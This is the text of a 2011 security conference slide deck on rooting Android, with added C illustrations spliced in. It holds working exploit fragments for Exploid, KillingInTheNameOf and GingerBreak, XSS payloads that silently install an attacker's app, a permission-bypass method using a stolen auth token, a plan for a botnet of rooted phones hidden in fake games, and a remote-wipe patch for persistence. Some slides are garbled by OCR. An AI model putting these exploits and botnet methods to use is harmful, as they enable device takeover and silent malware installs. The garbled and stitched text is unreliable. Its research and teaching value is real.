7/24/2019 bsides11-dontrootrobots
1/82
Slide 1: DON'T ROOT ROBOTS! - BSides Detroit 2011
Slide 2: A TEAM JOCH Production
Jon Oberheide + Zach Lanier = TEAM JOCH
Slide 3: DON'T DATE ROBOTS!
Slide 4: Agenda
Overview
Escalation
Delivery
Persistence
Slide 5: Overview
I Am A Humans!
What's in an Android?
Slide 6: Android at a Glance
Base platform
• ARM core
• Linux 2.6.x kernel
Native libraries
• libc, WebKit, etc.
Dalvik VM
• Register-based VM
• Runs dex bytecode
Applications
• Developed in Java
• Run on Dalvik VM
• Linux process 1:1
Slide 7: Permission-Based Model
Apps explicitly request predefined permissions
Examples:
• Cellular: calls, SMS, MMS
• Network, Bluetooth, WiFi
• Hardware: vibrate, backlight
• Location: coarse, fine
• App data: contacts, calendars
Slide 8: App Sandboxing
"Sandboxed" by standard UNIX uid/gid
• Generated unique per app at install time
High-level permissions restricted by Android runtime framework
Slide 9: App Distribution
Application signing
• Self-signed by developers
Android Market
• $25 signup, anyone can publish
• Anonymous signup is possible
Slide 10: Agenda
Overview
Escalation
Delivery
Persistence
Slide 11: DON'T ROOT ROBOTS!
Why root your Android?
Slide 12: Android Jailbreaks
Jailbreaks can be "GOOD"
• Exploid
• RageAgainstTheCage
• KillingInTheNameOf
• ZimperLich
• GingerBreak
LET'S DIVE IN!
Slide 14: Exploid Jailbreak
EXPLOID
Slide 15: CVE-2009-1185
Reduce, reuse, recycle... exploits!
Won 2009 Pwnie Award for best privesc!
Slide 16: Netlink in ASCII

   +---------------------+      +---------------------+
   | (3) application "A" |      | (3) application "B" |
   +------+--------------+      +--------------+------+
          |                                    |
          \                                    /
           \                                  /
            |                                |
   +--------+--------------------------------+-------+
   |        :                                :       |   user-space
 ==+        :   (5)  kernel socket API       :       +================
   |        :                                :       |   kernel-space
   +--------+--------------------------------+-------+
            |                                |
      +-----+--------------------------------+----+
      |        (1)  Netlink subsystem             |
      +---------------------+---------------------+
                            |
      +---------------------+---------------------+
      |       (2) Generic Netlink bus             |
      +--+--------------------------+-------+-----+
         |                          |       |
 +-------+---------+                |       |
 |  (4) controller |               /         \
 +-----------------+              /           \
                                  |             |
                   +--------------+------+   +--+------------------+
                   | (3) kernel user "X" |   | (3) kernel user "Y" |
                   +---------------------+   +---------------------+
Slide 17: Let's Pretend...
(same Netlink diagram as slide 16, labelled UDEV and KOBJECT_UEVENT)
Kernel notifies udev of kobject event via netlink interface
udev performs some privileged action
Slide 18: Lack of Source Checking
(same Netlink diagram as slide 16, labelled UDEV, KOBJECT_UEVENT and EVIL APP)
Evil app sends udev an evil message via netlink interface
udev performs evil privileged action
Slide 19: Exploid Jailbreak
Android "inherited" the udev vuln
• "init" daemon encapsulated udev functionality
• Still was present years after udev patch
My non-Android udev exploit just ran /tmp/run as root:

    /* NUL-separated uevent: "ACTION@DEVPATH" header, then KEY=VALUE strings */
    mp = message;
    mp += sprintf(mp, "remove@/d") + 1;
    mp += sprintf(mp, "SUBSYSTEM=block") + 1;
    mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
    mp += sprintf(mp, "TIMEOUT=10") + 1;
    mp += sprintf(mp, "ACTION=remove") + 1;
    mp += sprintf(mp, "REMOVE_CMD=/tmp/run") + 1;
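As an added illustration (not code from the talk, udev or Android's init): a parser for the NUL-separated uevent format shown above, plus the sender check that the vulnerable daemons lacked. The sample message is constructed from the one on this slide, and the credential check assumes the receiver set SO_PASSCRED so that recvmsg() delivers SCM_CREDENTIALS.

```c
#include <stdio.h>
#include <string.h>

/* A uevent as the kernel emits it over NETLINK_KOBJECT_UEVENT: a header
   "ACTION@DEVPATH" followed by NUL-separated "KEY=VALUE" strings. */
#define UEVENT_MAX_PAIRS 16
struct uevent {
    const char *header;
    const char *key[UEVENT_MAX_PAIRS];
    const char *val[UEVENT_MAX_PAIRS];
    int npairs;
};

/* Parse 'len' bytes of buf into ev (KEY=VALUE is split in place, so the
   values point into buf). Returns the pair count, or -1 if malformed. */
static int uevent_parse(char *buf, size_t len, struct uevent *ev)
{
    size_t off;
    memset(ev, 0, sizeof *ev);
    if (len == 0 || buf[len - 1] != '\0') return -1;  /* must end in NUL */
    ev->header = buf;
    if (strchr(ev->header, '@') == NULL) return -1;   /* no ACTION@DEVPATH */
    for (off = strlen(buf) + 1; off < len; ) {
        char *s = buf + off, *eq = strchr(s, '=');
        size_t slen = strlen(s);
        if (eq == NULL || eq == s || ev->npairs == UEVENT_MAX_PAIRS) return -1;
        *eq = '\0';
        ev->key[ev->npairs] = s;
        ev->val[ev->npairs] = eq + 1;
        ev->npairs++;
        off += slen + 1;
    }
    return ev->npairs;
}

static const char *uevent_get(const struct uevent *ev, const char *key)
{
    for (int i = 0; i < ev->npairs; i++)
        if (strcmp(ev->key[i], key) == 0) return ev->val[i];
    return NULL;
}

/* The check the vulnerable udev/init lacked. With SO_PASSCRED on the netlink
   socket, recvmsg() returns SCM_CREDENTIALS per message: a kernel-originated
   uevent carries uid 0 / pid 0, and the sender's nl_pid in the sockaddr_nl is
   also 0. Anything else came from a user process and must be dropped. */
static int uevent_source_is_kernel(unsigned uid, int pid, unsigned nl_pid)
{
    return uid == 0 && pid == 0 && nl_pid == 0;
}

/* Constructed samples: the message from the slide, and a malformed one. */
static const char g_sample[] =
    "remove@/d\0SUBSYSTEM=block\0DEVPATH=/dev/foo\0"
    "TIMEOUT=10\0ACTION=remove\0REMOVE_CMD=/tmp/run";
static char g_bad[] = "add@/d\0NOEQUALSSIGN";
static char g_work[sizeof g_sample];
static struct uevent g_ev;

static int sample_parse(void)   /* parses a fresh copy each call */
{
    memcpy(g_work, g_sample, sizeof g_sample);
    return uevent_parse(g_work, sizeof g_work, &g_ev);
}
static const char *sample_get(const char *k) { return uevent_get(&g_ev, k); }
static int bad_parse(void) { struct uevent e; return uevent_parse(g_bad, sizeof g_bad, &e); }

int main(void)
{
    printf("pairs=%d\n", sample_parse());
    printf("REMOVE_CMD=%s kernel? %d app? %d\n", sample_get("REMOVE_CMD"),
           uevent_source_is_kernel(0, 0, 0), uevent_source_is_kernel(10042, 1234, 1234));
    return 0;
}
```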
Slide 20: Exploid Payload
Stealth's payload looked like the following:

    close(creat("loading", 0666));
    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path, strlen(path)) < 0)
        die("[-] write");
    close(ofd);
    symlink("/proc/sys/kernel/hotplug", "data");
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
             "SUBSYSTEM=firmware%c"
             "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);

What's happening here?
• creates "loading" file
• writes "hotplug" file
• symlinks "data"
• netlink msg
• path to exploid binary
Slide 21: Use the Source, Luke!
From http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c :

    void process_firmware_event(struct uevent *uevent)
    {
        ...
        l = asprintf(&root, SYSFS_PREFIX"%s/", uevent->path);
        l = asprintf(&loading, "%sloading", root);               /* ^ /sys/../sqlite_stmt_journals/loading */
        l = asprintf(&data, "%sdata", root);                     /* ^ /sys/../sqlite_stmt_journals/data */
        l = asprintf(&file1, FIRMWARE_DIR1"/%s", uevent->firmware); /* ^ /etc/firmware/../../sqlite_stmt_journals/hotplug */
        ...
        loading_fd = open(loading, O_WRONLY);
        data_fd = open(data, O_WRONLY);
        fw_fd = open(file1, O_RDONLY);
        ...
        if(!load_firmware(fw_fd, loading_fd, data_fd))
22/82
Slide # 22DON'T ROOT ROBOTS! - BSides Detroit 2011
9#e the Source7 -u,e!
int load_firmware(int fw_fd, int loading_fd, int data_fd){...
write(loading_fd, "1", 1); /* start transfer */
while (len_to_copy > 0) { nr = read(fw_fd, buf, sizeof(buf));... while (nr > 0) { nw = write(data_fd, buf + nw, nr);
...}
9ro$ htt"5@@androidit-ernelor@F"="lator$@syste$@coreitMa=blobM=init@devicesc 5
< read ;ro" =hot(ug>
< write to =data>
Netin, "e##age cau#e# the init dae"on to read the
content# o; =hot(ug> and write the" into =data>
http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.chttp://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c7/24/2019 bsides11-dontrootrobots
23/82
Slide # 23DON'T ROOT ROBOTS! - BSides Detroit 2011
BOOM! ROOT!
'e$e$ber5% ;hot"l)< contains "ath to e*"loid
% ;data< is sy$lin-ed to @"roc@sys@-ernel@hot"l)
So5% @"roc@sys@-ernel@hot"l) no8 contains the "ath
to the e*"loid binary
% Overrides the dea)lt hot"l) "ath >nvo-e hot"l)5
% E*"loid 8ill be r)n as rootJ
Slide 24: RageAgainstTheCage Jailbreak
RAGEAGAINSTTHECAGE
Slide 25: Quick Trivia
What's wrong with the following code?
Assuming a uid/euid=0 process dropping privileges

    /* Code intended to run with elevated privileges */
    do_stuff_as_privileged();

    /* Drop privileges to unprivileged user */
    setuid(uid);

    /* Code intended to run with lower privileges */
    do_stuff_as_unprivileged();
Slide 26: Setuid Quirks

    /* Drop privileges to unprivileged user */
    setuid(uid);

From setuid(2) man page:

    ERRORS
    EAGAIN  The uid does not match the current uid and uid brings process over its
            RLIMIT_NPROC resource limit.

Well, there's really only one line of interest:
It's true, setuid() can and will fail
Slide 27: Linux Resource Limits
What is RLIMIT_NPROC?

    RLIMIT_NPROC  The maximum number of processes (or, more precisely on Linux, threads) that can be
                  created for the real user ID of the calling process. Upon encountering this limit, fork(2)
                  fails with the error EAGAIN.

If there are too many processes for the uid we're dropping to, setuid() will fail!
Therefore, privileges will not be dropped and we'll continue execution with uid=0!
Slide 28: Exploiting setuid() Issues
If we can artificially inflate the number of processes owned by the target uid, we can hit the uid's RLIMIT_NPROC and force setuid() to fail with errno EAGAIN.
Hopefully, the binary running with uid=0 will then perform some unsafe operation that we can influence
Slide 29: Android Debug Bridge
ADB:
"Android Debug Bridge (adb) is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. It is a client-server program that includes three components: ... A daemon, which runs as a background process on each emulator or device instance."
Guess what ADB fails to do when it calls setuid to drop privileges?
Slide 30: RageAgainstTheCage Exploit
ADB fails to check setuid() return value:

    /* then switch user and group to "shell" */
    setgid(AID_SHELL);
    setuid(AID_SHELL);

RageAgainstTheCage exploit:
• fork() up to RLIMIT_NPROC for "shell" user
• Kill adb, fork() again, adb fails setuid()
• Your adb shell is now a root shell!
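Added example, not code from the talk or from adb, covering the setuid() quirk of slides 25 to 28 and the unchecked adb call above: the unchecked pattern beside a fail-closed version, run against a constructed stand-in for setuid(2) that fails with EAGAIN once the target uid is at RLIMIT_NPROC. model_setuid, model_getuid, the scenario runners and the uid 2000 for "shell" are this example's assumptions.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define SHELL_UID 2000u   /* AID_SHELL on Android */

/* Constructed model of the kernel state the slides describe: the current
   uid, and how many processes the target uid already owns vs RLIMIT_NPROC.
   model_setuid() stands in for setuid(2); it is not the real syscall. */
static uid_t    g_cur_uid;
static unsigned g_target_nproc;
static unsigned g_rlimit_nproc;

static int model_setuid(uid_t uid)
{
    if (uid != g_cur_uid && g_target_nproc >= g_rlimit_nproc) {
        errno = EAGAIN;           /* the documented failure from the man page */
        return -1;
    }
    g_cur_uid = uid;
    return 0;
}
static uid_t model_getuid(void) { return g_cur_uid; }

/* BEFORE: the pattern from the slides. The return value is discarded, so
   this reports success whatever happened and the caller runs on as uid 0. */
static int drop_privs_unchecked(uid_t uid)
{
    model_setuid(uid);
    return 0;
}

/* AFTER: fail closed. Check the return value, then confirm via getuid()
   that the switch took effect; on -1 the caller must exit, not continue. */
static int drop_privs_checked(uid_t uid)
{
    if (model_setuid(uid) != 0) {
        fprintf(stderr, "setuid(%u): %s\n", (unsigned)uid, strerror(errno));
        return -1;
    }
    if (model_getuid() != uid) {
        fprintf(stderr, "setuid(%u) returned 0 but uid did not change\n", (unsigned)uid);
        return -1;
    }
    return 0;
}

/* Scenario runners: start as uid 0 with the given load on the target uid,
   drop privileges, and report the outcome. */
static uid_t uid_after_unchecked(unsigned nproc, unsigned limit)
{
    g_cur_uid = 0; g_target_nproc = nproc; g_rlimit_nproc = limit;
    drop_privs_unchecked(SHELL_UID);
    return g_cur_uid;                 /* what the process is really running as */
}
static int checked_result(unsigned nproc, unsigned limit)
{
    g_cur_uid = 0; g_target_nproc = nproc; g_rlimit_nproc = limit;
    return drop_privs_checked(SHELL_UID);
}

int main(void)
{
    printf("unchecked, NPROC exhausted: still uid %u\n", (unsigned)uid_after_unchecked(100, 100));
    printf("checked,   NPROC exhausted: rc=%d\n", checked_result(100, 100));
    printf("checked,   NPROC available: rc=%d\n", checked_result(5, 100));
    return 0;
}
```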
Slide 31: KillingInTheNameOf Jailbreak
KILLINGINTHENAMEOF
Slide 32: Android's ashmem
ashmem
• Custom shmem interface by Google:
"The ashmem subsystem is a new shared memory allocator, similar to POSIX SHM but with different behavior and sporting a simpler file-based API."
Custom code = ripe for vulnerabilities!
Slide 33: ashmem Property Mapping
ashmem maps in Android system properties in to each address space
Not mmaped PROT_WRITE thankfully, that would be bad, wouldn't it?

    # cat /proc/178/maps
    ...
    40000000-40008000 r-xs 00000000 00:07 187    /dev/ashmem/system_properties (deleted)
    ...
Slide 34: Android Properties
Android properties:

    $ getprop
    [ro.secure]: [1]
    [ro.allow.mock.location]: [1]
    [ro.debuggable]: [1]
    ...

ro.secure determines whether ADB runs as root or drops privs to AID_SHELL user
If we can change it to 0, we've got root!
Slide 35: KillingInTheNameOf Exploit
Turns out ashmem will let us mprotect the mapping as PROT_WRITE:
Flip the ro.secure property to 0:
Spawn root adb shell!

    printf("[+] Found prop area @ %p\n", prop);
    if (mprotect(prop, PA_SIZE, PROT_READ|PROT_WRITE) < 0)
        die("[-] mprotect");
    if (strcmp(pi->name, "ro.secure") == 0) {
        strcpy(pi->value, "0");
Slide 36: ZimperLich Jailbreak
ZIMPERLICH
Slide 37: ZimperLich Jailbreak
GUESS WHAT?
Same as RageInTheCage, except for the zygote process!
Missing return value check on setuid(2)
Slide 38: GingerBreak Jailbreak
GINGERBREAK
Slide 39: GingerBreak Jailbreak
GUESS WHAT AGAIN?
Same as Exploid, except for the vold process!
Missing source check on netlink message
Slide 40: GingerBreak Vulnerability
Spot the vuln in vold's DirectVolume.cpp!

    void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {
        int major = atoi(evt->findParam("MAJOR"));
        int minor = atoi(evt->findParam("MINOR"));
        ...
        int part_num;
        const char *tmp = evt->findParam("PARTN");
        ...
        part_num = atoi(tmp);
        ...
        if (part_num > mDiskNumParts) {
            mDiskNumParts = part_num;
        }
        mPartMinors[part_num - 1] = minor;
Slide 41: Arbitrary Write Vulnerability
Arbitrary write via negative index
• Spoof netlink msg with maliciously crafted PARTN and MINOR

    n = snprintf(buf, sizeof(buf), "@/foo%cACTION=add%c" "SUBSYSTEM=block%c" "DEVPATH=%s%c"
                 "MAJOR=179%cMINOR=%d%c" "DEVTYPE=harder%cPARTN=%d",
                 0, 0, 0, bsh, 0, 0, vold.system, 0, 0, -idx);
Slide 42: GingerBreak NX Bypass
But where/what to write?
Some Android devices have NX stack/heap
• But lack other hardening mechanisms: GCC's RELRO
• gcc -Wl,-z,relro,-z,now
• Maps GOT as read-only
If no RELRO:
• Clobber GOT entry to modify control flow
Slide 43: GingerBreak Exploit
Not quite so simple though:
• Discover GOT, system(), etc. addresses
• Clobber GOT for functions (atoi, etc.) = system()
• Funcs called on attacker controlled data:
• atoi=system and tmp="/data/local/tmp/boomsh"
Impact?
• Pretty catastrophic

Javascript XSS payload can trigger the install of any app to your phone.
Slide 52: XSS Install Payload
Install payload:

    /* silently install malicious app to victim phone */
    $.post('/install', {
        id: 'com.attacker.maliciousapp',
        device: initProps['selectedDeviceId'],
        token: initProps['token'],
        xhr: '1'
    }, function(data) {});

Forces user's browser to request install of com.attacker.maliciousapp
Slide 53: XSS Trigger Payload
Trigger payload:

    /* append hidden iframe */
    $('body').append($(''));

    /* continually trigger iframe src */
    function trigger() {
        $('#xss').attr('src', 'trigger://blah');
        setTimeout('trigger()', 1000);
    }
    setTimeout('trigger()', 1000);

Forces user's phone to "autorun" the malicious app after install
Slide 54: Web Market Lessons
XSS + RCE
• Rarely used in the same sentence!
Cross-device vulnerabilities
• Don't cross the streams... at least without a simple confirmation prompt! :o
Fixed the XSS but not the underlying issue
• Just wait a few months for the next XSS
Slide 55: Angry Birds Attack
ANGRY BIRDS ATTACK
Slide 56: Perceived App Install Process
1. Browse, 2. Install, 3. Approve, BOOM!
Slide 57: Actual App Install Process
1. User clicks install/approve
2. Market app POSTs install request to Google
3. Market servers signal C2DM servers
4. C2DM servers push down INSTALL_ASSET
5. GTalkService receives INSTALL_ASSET and invokes vending
6. Vending component fetches APK and installs
Slide 58: Market Interactions
Google is a sneaky panda!
• You don't actually download / install the app through the market application
When you click install in market app
• Google servers push an out-of-band message down to you via persistent data connection
• Triggers INSTALL_ASSET intent to start install
• Intent handler fetches APK and installs
Slide 59: Dex Bytecode RE
Slide 60: GTalkService Connection
Persistent data connection
• Speaks XMPP
• Same connection now used for C2DM push service
Gap in responsibility:
• Market app approves perms
• But GTalkService triggers install
• There's a disconnect here
Slide 61: Market App Requests
What does the market app POST to the market server?
Can we spoof the same request and trigger an INSTALL_ASSET message and subsequent install?
Slide 62: Base64 Encoded Protobuf
Slide 63: Raw Protobuf Decoded
Slide 64: RE'ed Protobuf Specification
app/asset ID
auth token
install request message
Slide 65: Elements of an Install Request
We have the format of the request now!
Need to populate it with:
• Lots of miscellaneous fields
• App ID: target app to be installed. Can be derived from dissecting market requests
• Auth token: the hard part? Turns out we can steal it from Android's AccountManager!
Slide 66: Bypassing Permissions Approval
Steal the "android" service token used by market from the AccountManager
Construct protobuf request to market servers for invoking an application install
INSTALL_ASSET is pushed and app installed without any user prompt / permission approval
PoC disguised as an Angry Birds expansion app
Slide 67: Angry Birds Bonus Levels
Slide 68: Fake Toll Fraud App
Slide 69: RootStrap
ROOTSTRAP
Slide 70: Android Native Code
Dalvik VM != sandbox
• Not limited to executing dex bytecode
• Can pop out of the VM to execute native code
Native code packaged within APKs
• Android should do some code signing like iPhone
• But it doesn't, so why limit execution of native code to build-time packaged modules?
Slide 71: RootStrap
How to deliver payloads most effectively?
Enter, RootStrap
• Silent runtime fetching and execution of remote ARM payloads
Slide 72: Native ARM Code Delivery
Fetch index file
• Lists available exploits and module names
Yank down ARM modules
• Dumped to Android app private storage
• eg /data/data/org.rootstrap/files, not /libs
Load via JNI and execute each payload
• System.load("/files/root1.so")
Slide 73: How to Build a Mobile Botnet
Build some fun legit-looking games / apps
• Include RootStrap functionality
• Periodically phone home to check for new payloads
As soon as new vuln/jailbreak is published, push down payload to RootStrapped phones
• Before providers push out OTA patch
• Trivial to win that race, slow OTA updates
Root-kit a bunch of phones!
Slide 74: A Wolf in Vampire's Clothing?
RootStrap app is boring and not sneaky
• No one would intentionally download it
• Need something legit looking to get a large install base
Hmm, what to do, what to do...
Slide 75: Fake Twilight Eclipse App
Slide 76: Andy and Jaime Don't Like It :(
Still, 200+ downloads in under 24 hours
With a legit-looking app/game, you could collect quite an install base for RootStrap
Slide 77: Agenda
Overview
Escalation
Delivery
Persistence
Slide 78: Persistence
Hands off our rootkit!
Slide 79: Staying on the Device
Google will wipe "bad" apps
• My RootStrap app, as a dry-run
• DroidDream malware, for realz!
Bad guys want to stay on the device
• Maintain C&C, deliver new payloads, etc.
"Surprisingly enough I've yet to see any Android malware perform any post-rooting self-protection."
Slide 80: REMOVE_ASSET Patching
REMOVE_ASSET
• Allows Google to remote wipe apps
• Easy to patch out the dex code if you're root
Vending.apk
• com.android.vending
• RemoveAssetReceiver class
• Patch in a 0x0e00 / return-void instruction at beginning of onReceive()
Slide 81: Questions?
Slide 82: Jon Oberheide
@jonoberheide
jon@oberheide.org
Duo Security